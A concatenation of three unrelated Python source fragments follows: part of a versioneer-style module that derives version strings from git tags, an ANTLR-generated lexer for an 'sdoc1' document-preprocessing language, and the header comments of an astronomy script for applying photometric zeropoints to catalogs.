print("unable to find command, tried %s" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
# Source tarballs conventionally unpack into a directory that includes
# both the project name and a version string.
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '%s', but '%s' doesn't start with "
"prefix '%s'" % (root, dirname, parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
if not keywords:
raise NotThisMethod("no keywords at all, weird")
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs-tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
# this runs 'git' from the root of the source tree. This only gets called
# if the git-archive 'subst' keywords were *not* expanded, and
# _version.py hasn't already been rewritten with a short version string,
# meaning we're inside a checked out source tree.
if not os.path.exists(os.path.join(root, ".git")):
if verbose:
print("no .git in %s" % root)
raise NotThisMethod("no .git directory")
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
# if there is a tag, this yields TAG-NUM-gHEX[-dirty]
# if there are no tags, this yields HEX[-dirty] (no NUM)
describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long"],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
return pieces
def plus_or_dot(pieces):
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
# now build up version string, with post-release "local version
# identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
# get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
# exceptions:
# 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
# TAG[.post.devDISTANCE] . No -dirty
# exceptions:
# 1: no tags. 0.post.devDISTANCE
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
# TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that
# .dev0 sorts backwards (a dirty tree will appear "older" than the
# corresponding clean one), but you shouldn't be releasing software with
# -dirty anyways.
# exceptions:
# 1: no tags. 0.postDISTANCE[.dev0]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
# TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty.
# exceptions:
# 1: no tags. 0.postDISTANCE[.dev0]
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
# TAG[-DISTANCE-gHEX][-dirty], like 'git describe --tags --dirty
# --always'
# exceptions:
# 1: no tags. HEX[-dirty] (note: no 'g' prefix)
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
# TAG-DISTANCE-gHEX[-dirty], like 'git describe --tags --dirty
# --always -long'. The distance/hash is unconditional.
# exceptions:
# 1: no tags. HEX[-dirty] (note: no 'g' prefix)
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"]}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
def get_versions():
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree"}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version"}
|
|
# Generated from sdoc/antlr/sdoc1Lexer.g4 by ANTLR 4.5.3
from antlr4 import *
from io import StringIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\2*")
buf.write("\u013d\b\1\b\1\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6")
buf.write("\t\6\4\7\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f")
buf.write("\4\r\t\r\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22")
buf.write("\t\22\4\23\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27")
buf.write("\4\30\t\30\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35")
buf.write("\t\35\4\36\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4")
buf.write("$\t$\4%\t%\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t")
buf.write(",\3\2\6\2]\n\2\r\2\16\2^\3\2\3\2\5\2c\n\2\3\3\3\3\7\3")
buf.write("g\n\3\f\3\16\3j\13\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3")
buf.write("\4\3\4\3\4\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\6\3\6")
buf.write("\3\6\3\6\3\6\3\6\3\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\b\3")
buf.write("\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3\t\3\t\3\t\3\t")
buf.write("\3\t\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\3")
buf.write("\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3\f\3\f\3\f\3\f\3")
buf.write("\f\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\3\r\3\r\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3")
buf.write("\16\3\16\3\16\3\16\3\16\3\16\3\17\3\17\6\17\u00d7\n\17")
buf.write("\r\17\16\17\u00d8\3\20\3\20\3\21\3\21\3\21\3\21\3\22\3")
buf.write("\22\3\22\6\22\u00e4\n\22\r\22\16\22\u00e5\3\23\3\23\3")
buf.write("\24\3\24\3\24\3\24\3\25\6\25\u00ef\n\25\r\25\16\25\u00f0")
buf.write("\3\25\3\25\3\26\3\26\3\27\3\27\3\30\3\30\3\31\3\31\3\32")
buf.write("\3\32\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\36\3\37")
buf.write("\3\37\3 \3 \3 \3!\3!\3!\3\"\3\"\3\"\3#\3#\3$\3$\3$\3%")
buf.write("\3%\3%\3&\3&\3\'\3\'\3\'\7\'\u0120\n\'\f\'\16\'\u0123")
buf.write("\13\'\3(\6(\u0126\n(\r(\16(\u0127\3)\3)\3*\3*\3+\3+\3")
buf.write("+\3+\5+\u0132\n+\3,\3,\3,\7,\u0137\n,\f,\16,\u013a\13")
buf.write(",\3,\3,\3\u0138\2-\5\3\7\4\t\5\13\6\r\7\17\b\21\t\23\n")
buf.write("\25\13\27\f\31\r\33\16\35\17\37\20!\21#\22%\23\'\24)\25")
buf.write("+\26-\27/\30\61\31\63\32\65\33\67\349\35;\36=\37? A!C")
buf.write("\"E#G$I%K&M\'O(Q)S\2U\2W\2Y*\5\2\3\4\n\3\2^^\4\2\f\f\17")
buf.write("\17\4\2aac|\5\2^^}}\177\177\5\2\13\f\17\17\"\"\5\2C\\")
buf.write("aac|\3\2\62;\3\2))\u0144\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3")
buf.write("\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2")
buf.write("\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2")
buf.write("\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\3!\3\2\2\2\3")
buf.write("#\3\2\2\2\3%\3\2\2\2\4\'\3\2\2\2\4)\3\2\2\2\4+\3\2\2\2")
buf.write("\4-\3\2\2\2\4/\3\2\2\2\4\61\3\2\2\2\4\63\3\2\2\2\4\65")
buf.write("\3\2\2\2\4\67\3\2\2\2\49\3\2\2\2\4;\3\2\2\2\4=\3\2\2\2")
buf.write("\4?\3\2\2\2\4A\3\2\2\2\4C\3\2\2\2\4E\3\2\2\2\4G\3\2\2")
buf.write("\2\4I\3\2\2\2\4K\3\2\2\2\4M\3\2\2\2\4O\3\2\2\2\4Q\3\2")
buf.write("\2\2\4Y\3\2\2\2\5b\3\2\2\2\7d\3\2\2\2\tm\3\2\2\2\13v\3")
buf.write("\2\2\2\r\177\3\2\2\2\17\u0087\3\2\2\2\21\u008d\3\2\2\2")
buf.write("\23\u0094\3\2\2\2\25\u009d\3\2\2\2\27\u00ab\3\2\2\2\31")
buf.write("\u00b1\3\2\2\2\33\u00bc\3\2\2\2\35\u00c6\3\2\2\2\37\u00d4")
buf.write("\3\2\2\2!\u00da\3\2\2\2#\u00dc\3\2\2\2%\u00e3\3\2\2\2")
buf.write("\'\u00e7\3\2\2\2)\u00e9\3\2\2\2+\u00ee\3\2\2\2-\u00f4")
buf.write("\3\2\2\2/\u00f6\3\2\2\2\61\u00f8\3\2\2\2\63\u00fa\3\2")
buf.write("\2\2\65\u00fc\3\2\2\2\67\u00fe\3\2\2\29\u0100\3\2\2\2")
buf.write(";\u0102\3\2\2\2=\u0104\3\2\2\2?\u0107\3\2\2\2A\u0109\3")
buf.write("\2\2\2C\u010c\3\2\2\2E\u010f\3\2\2\2G\u0112\3\2\2\2I\u0114")
buf.write("\3\2\2\2K\u0117\3\2\2\2M\u011a\3\2\2\2O\u011c\3\2\2\2")
buf.write("Q\u0125\3\2\2\2S\u0129\3\2\2\2U\u012b\3\2\2\2W\u0131\3")
buf.write("\2\2\2Y\u0133\3\2\2\2[]\n\2\2\2\\[\3\2\2\2]^\3\2\2\2^")
buf.write("\\\3\2\2\2^_\3\2\2\2_c\3\2\2\2`a\7^\2\2ac\7^\2\2b\\\3")
buf.write("\2\2\2b`\3\2\2\2c\6\3\2\2\2dh\5\t\4\2eg\n\3\2\2fe\3\2")
buf.write("\2\2gj\3\2\2\2hf\3\2\2\2hi\3\2\2\2ik\3\2\2\2jh\3\2\2\2")
buf.write("kl\t\3\2\2l\b\3\2\2\2mn\7^\2\2no\7e\2\2op\7q\2\2pq\7o")
buf.write("\2\2qr\7o\2\2rs\7g\2\2st\7p\2\2tu\7v\2\2u\n\3\2\2\2vw")
buf.write("\7^\2\2wx\7f\2\2xy\7g\2\2yz\7d\2\2z{\7w\2\2{|\7i\2\2|")
buf.write("}\3\2\2\2}~\b\5\2\2~\f\3\2\2\2\177\u0080\7^\2\2\u0080")
buf.write("\u0081\7g\2\2\u0081\u0082\7n\2\2\u0082\u0083\7k\2\2\u0083")
buf.write("\u0084\7h\2\2\u0084\u0085\3\2\2\2\u0085\u0086\b\6\2\2")
buf.write("\u0086\16\3\2\2\2\u0087\u0088\7^\2\2\u0088\u0089\7g\2")
buf.write("\2\u0089\u008a\7n\2\2\u008a\u008b\7u\2\2\u008b\u008c\7")
buf.write("g\2\2\u008c\20\3\2\2\2\u008d\u008e\7^\2\2\u008e\u008f")
buf.write("\7g\2\2\u008f\u0090\7p\2\2\u0090\u0091\7f\2\2\u0091\u0092")
buf.write("\7k\2\2\u0092\u0093\7h\2\2\u0093\22\3\2\2\2\u0094\u0095")
buf.write("\7^\2\2\u0095\u0096\7g\2\2\u0096\u0097\7t\2\2\u0097\u0098")
buf.write("\7t\2\2\u0098\u0099\7q\2\2\u0099\u009a\7t\2\2\u009a\u009b")
buf.write("\3\2\2\2\u009b\u009c\b\t\3\2\u009c\24\3\2\2\2\u009d\u009e")
buf.write("\7^\2\2\u009e\u009f\7g\2\2\u009f\u00a0\7z\2\2\u00a0\u00a1")
buf.write("\7r\2\2\u00a1\u00a2\7t\2\2\u00a2\u00a3\7g\2\2\u00a3\u00a4")
buf.write("\7u\2\2\u00a4\u00a5\7u\2\2\u00a5\u00a6\7k\2\2\u00a6\u00a7")
buf.write("\7q\2\2\u00a7\u00a8\7p\2\2\u00a8\u00a9\3\2\2\2\u00a9\u00aa")
buf.write("\b\n\2\2\u00aa\26\3\2\2\2\u00ab\u00ac\7^\2\2\u00ac\u00ad")
buf.write("\7k\2\2\u00ad\u00ae\7h\2\2\u00ae\u00af\3\2\2\2\u00af\u00b0")
buf.write("\b\13\2\2\u00b0\30\3\2\2\2\u00b1\u00b2\7^\2\2\u00b2\u00b3")
buf.write("\7k\2\2\u00b3\u00b4\7p\2\2\u00b4\u00b5\7e\2\2\u00b5\u00b6")
buf.write("\7n\2\2\u00b6\u00b7\7w\2\2\u00b7\u00b8\7f\2\2\u00b8\u00b9")
buf.write("\7g\2\2\u00b9\u00ba\3\2\2\2\u00ba\u00bb\b\f\3\2\u00bb")
buf.write("\32\3\2\2\2\u00bc\u00bd\7^\2\2\u00bd\u00be\7p\2\2\u00be")
buf.write("\u00bf\7q\2\2\u00bf\u00c0\7v\2\2\u00c0\u00c1\7k\2\2\u00c1")
buf.write("\u00c2\7e\2\2\u00c2\u00c3\7g\2\2\u00c3\u00c4\3\2\2\2\u00c4")
buf.write("\u00c5\b\r\3\2\u00c5\34\3\2\2\2\u00c6\u00c7\7^\2\2\u00c7")
buf.write("\u00c8\7u\2\2\u00c8\u00c9\7w\2\2\u00c9\u00ca\7d\2\2\u00ca")
buf.write("\u00cb\7u\2\2\u00cb\u00cc\7v\2\2\u00cc\u00cd\7k\2\2\u00cd")
buf.write("\u00ce\7v\2\2\u00ce\u00cf\7w\2\2\u00cf\u00d0\7v\2\2\u00d0")
buf.write("\u00d1\7g\2\2\u00d1\u00d2\3\2\2\2\u00d2\u00d3\b\16\2\2")
buf.write("\u00d3\36\3\2\2\2\u00d4\u00d6\7^\2\2\u00d5\u00d7\t\4\2")
buf.write("\2\u00d6\u00d5\3\2\2\2\u00d7\u00d8\3\2\2\2\u00d8\u00d6")
buf.write("\3\2\2\2\u00d8\u00d9\3\2\2\2\u00d9 \3\2\2\2\u00da\u00db")
buf.write("\7}\2\2\u00db\"\3\2\2\2\u00dc\u00dd\7\177\2\2\u00dd\u00de")
buf.write("\3\2\2\2\u00de\u00df\b\21\4\2\u00df$\3\2\2\2\u00e0\u00e4")
buf.write("\n\5\2\2\u00e1\u00e2\7^\2\2\u00e2\u00e4\13\2\2\2\u00e3")
buf.write("\u00e0\3\2\2\2\u00e3\u00e1\3\2\2\2\u00e4\u00e5\3\2\2\2")
buf.write("\u00e5\u00e3\3\2\2\2\u00e5\u00e6\3\2\2\2\u00e6&\3\2\2")
buf.write("\2\u00e7\u00e8\7}\2\2\u00e8(\3\2\2\2\u00e9\u00ea\7\177")
buf.write("\2\2\u00ea\u00eb\3\2\2\2\u00eb\u00ec\b\24\4\2\u00ec*\3")
buf.write("\2\2\2\u00ed\u00ef\t\6\2\2\u00ee\u00ed\3\2\2\2\u00ef\u00f0")
buf.write("\3\2\2\2\u00f0\u00ee\3\2\2\2\u00f0\u00f1\3\2\2\2\u00f1")
buf.write("\u00f2\3\2\2\2\u00f2\u00f3\b\25\5\2\u00f3,\3\2\2\2\u00f4")
buf.write("\u00f5\7*\2\2\u00f5.\3\2\2\2\u00f6\u00f7\7+\2\2\u00f7")
buf.write("\60\3\2\2\2\u00f8\u00f9\7]\2\2\u00f9\62\3\2\2\2\u00fa")
buf.write("\u00fb\7_\2\2\u00fb\64\3\2\2\2\u00fc\u00fd\7,\2\2\u00fd")
buf.write("\66\3\2\2\2\u00fe\u00ff\7\61\2\2\u00ff8\3\2\2\2\u0100")
buf.write("\u0101\7-\2\2\u0101:\3\2\2\2\u0102\u0103\7/\2\2\u0103")
buf.write("<\3\2\2\2\u0104\u0105\7?\2\2\u0105\u0106\7?\2\2\u0106")
buf.write(">\3\2\2\2\u0107\u0108\7@\2\2\u0108@\3\2\2\2\u0109\u010a")
buf.write("\7@\2\2\u010a\u010b\7?\2\2\u010bB\3\2\2\2\u010c\u010d")
buf.write("\7(\2\2\u010d\u010e\7(\2\2\u010eD\3\2\2\2\u010f\u0110")
buf.write("\7~\2\2\u0110\u0111\7~\2\2\u0111F\3\2\2\2\u0112\u0113")
buf.write("\7>\2\2\u0113H\3\2\2\2\u0114\u0115\7>\2\2\u0115\u0116")
buf.write("\7?\2\2\u0116J\3\2\2\2\u0117\u0118\7#\2\2\u0118\u0119")
buf.write("\7?\2\2\u0119L\3\2\2\2\u011a\u011b\7?\2\2\u011bN\3\2\2")
buf.write("\2\u011c\u0121\5S)\2\u011d\u0120\5S)\2\u011e\u0120\5U")
buf.write("*\2\u011f\u011d\3\2\2\2\u011f\u011e\3\2\2\2\u0120\u0123")
buf.write("\3\2\2\2\u0121\u011f\3\2\2\2\u0121\u0122\3\2\2\2\u0122")
buf.write("P\3\2\2\2\u0123\u0121\3\2\2\2\u0124\u0126\5U*\2\u0125")
buf.write("\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0125\3\2\2\2")
buf.write("\u0127\u0128\3\2\2\2\u0128R\3\2\2\2\u0129\u012a\t\7\2")
buf.write("\2\u012aT\3\2\2\2\u012b\u012c\t\b\2\2\u012cV\3\2\2\2\u012d")
buf.write("\u012e\7^\2\2\u012e\u0132\7^\2\2\u012f\u0130\7^\2\2\u0130")
buf.write("\u0132\7)\2\2\u0131\u012d\3\2\2\2\u0131\u012f\3\2\2\2")
buf.write("\u0132X\3\2\2\2\u0133\u0138\7)\2\2\u0134\u0137\5W+\2\u0135")
buf.write("\u0137\n\t\2\2\u0136\u0134\3\2\2\2\u0136\u0135\3\2\2\2")
buf.write("\u0137\u013a\3\2\2\2\u0138\u0139\3\2\2\2\u0138\u0136\3")
buf.write("\2\2\2\u0139\u013b\3\2\2\2\u013a\u0138\3\2\2\2\u013b\u013c")
buf.write("\7)\2\2\u013cZ\3\2\2\2\22\2\3\4^bh\u00d8\u00e3\u00e5\u00f0")
buf.write("\u011f\u0121\u0127\u0131\u0136\u0138\6\4\4\2\4\3\2\4\2")
buf.write("\2\2\3\2")
return buf.getvalue()
class sdoc1Lexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
MODE_SIMPLE = 1
MODE_EXPR = 2
TEXT = 1
LINE_COMMENT = 2
COMMENT = 3
DEBUG = 4
ELIF = 5
ELSE = 6
ENDIF = 7
ERROR = 8
EXPRESSION = 9
IF = 10
INCLUDE = 11
NOTICE = 12
SUBSTITUTE = 13
SDOC2_COMMAND = 14
SIMPLE_OBRACE = 15
SIMPLE_CBRACE = 16
SIMPLE_ARG = 17
EXPR_OBRACE = 18
EXPR_CBRACE = 19
EXPR_WS = 20
EXPR_LEFT_PAREN = 21
EXPR_RIGHT_PAREN = 22
EXPR_LEFT_BRACKET = 23
EXPR_RIGHT_BRACKET = 24
EXPR_MULT = 25
EXPR_DIV = 26
EXPR_ADD = 27
EXPR_MINUS = 28
EXPR_EQUAL = 29
EXPR_GT = 30
EXPR_GTE = 31
EXPR_LOGICAL_AND = 32
EXPR_LOGICAL_OR = 33
EXPR_LT = 34
EXPR_LTE = 35
EXPR_NOT_EQUAL = 36
EXPR_ASSIGN = 37
EXPR_IDENTIFIER = 38
EXPR_INTEGER_CONSTANT = 39
EXPR_STRING_CONSTANT = 40
modeNames = [ "DEFAULT_MODE", "MODE_SIMPLE", "MODE_EXPR" ]
literalNames = [ "<INVALID>",
"'\\comment'", "'\\debug'", "'\\elif'", "'\\else'", "'\\endif'",
"'\\error'", "'\\expression'", "'\\if'", "'\\include'", "'\\notice'",
"'\\substitute'", "'('", "')'", "'['", "']'", "'*'", "'/'",
"'+'", "'-'", "'=='", "'>'", "'>='", "'&&'", "'||'", "'<'",
"'<='", "'!='", "'='" ]
symbolicNames = [ "<INVALID>",
"TEXT", "LINE_COMMENT", "COMMENT", "DEBUG", "ELIF", "ELSE",
"ENDIF", "ERROR", "EXPRESSION", "IF", "INCLUDE", "NOTICE", "SUBSTITUTE",
"SDOC2_COMMAND", "SIMPLE_OBRACE", "SIMPLE_CBRACE", "SIMPLE_ARG",
"EXPR_OBRACE", "EXPR_CBRACE", "EXPR_WS", "EXPR_LEFT_PAREN",
"EXPR_RIGHT_PAREN", "EXPR_LEFT_BRACKET", "EXPR_RIGHT_BRACKET",
"EXPR_MULT", "EXPR_DIV", "EXPR_ADD", "EXPR_MINUS", "EXPR_EQUAL",
"EXPR_GT", "EXPR_GTE", "EXPR_LOGICAL_AND", "EXPR_LOGICAL_OR",
"EXPR_LT", "EXPR_LTE", "EXPR_NOT_EQUAL", "EXPR_ASSIGN", "EXPR_IDENTIFIER",
"EXPR_INTEGER_CONSTANT", "EXPR_STRING_CONSTANT" ]
ruleNames = [ "TEXT", "LINE_COMMENT", "COMMENT", "DEBUG", "ELIF", "ELSE",
"ENDIF", "ERROR", "EXPRESSION", "IF", "INCLUDE", "NOTICE",
"SUBSTITUTE", "SDOC2_COMMAND", "SIMPLE_OBRACE", "SIMPLE_CBRACE",
"SIMPLE_ARG", "EXPR_OBRACE", "EXPR_CBRACE", "EXPR_WS",
"EXPR_LEFT_PAREN", "EXPR_RIGHT_PAREN", "EXPR_LEFT_BRACKET",
"EXPR_RIGHT_BRACKET", "EXPR_MULT", "EXPR_DIV", "EXPR_ADD",
"EXPR_MINUS", "EXPR_EQUAL", "EXPR_GT", "EXPR_GTE", "EXPR_LOGICAL_AND",
"EXPR_LOGICAL_OR", "EXPR_LT", "EXPR_LTE", "EXPR_NOT_EQUAL",
"EXPR_ASSIGN", "EXPR_IDENTIFIER", "EXPR_INTEGER_CONSTANT",
"EXPR_NON_DIGIT", "EXPR_DIGIT", "ESCAPED_CHAR", "EXPR_STRING_CONSTANT" ]
grammarFileName = "sdoc1Lexer.g4"
def __init__(self, input=None):
super().__init__(input)
self.checkVersion("4.5.3")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
|
|
#!/usr/bin/env python
#adam-use# put bigmacs zps in cats and headers of coadd.fits and calculate NFILT
#adam-example# ipython -i -- adam_bigmacs_apply_zps_and_add_NFILT.py -i /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1226+21/PHOTOMETRY_W-C-RC_aper/MACS1226+21.unstacked.split_apers.cat -o /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1226+21/PHOTOMETRY_W-C-RC_aper/MACS1226+21.calibrated.cat -z /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1226+21/PHOTOMETRY_W-C-RC_aper/MACS1226+21.bigmacs_cleaned_offsets.list
#adam-example# ipython -i -- adam_bigmacs_apply_zps_and_add_NFILT.py -i /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.unstacked.split_apers.cat -o /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.calibrated_PureStarCalib.cat -z /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.bigmacs_cleaned_offsets-PureStarCalib.list
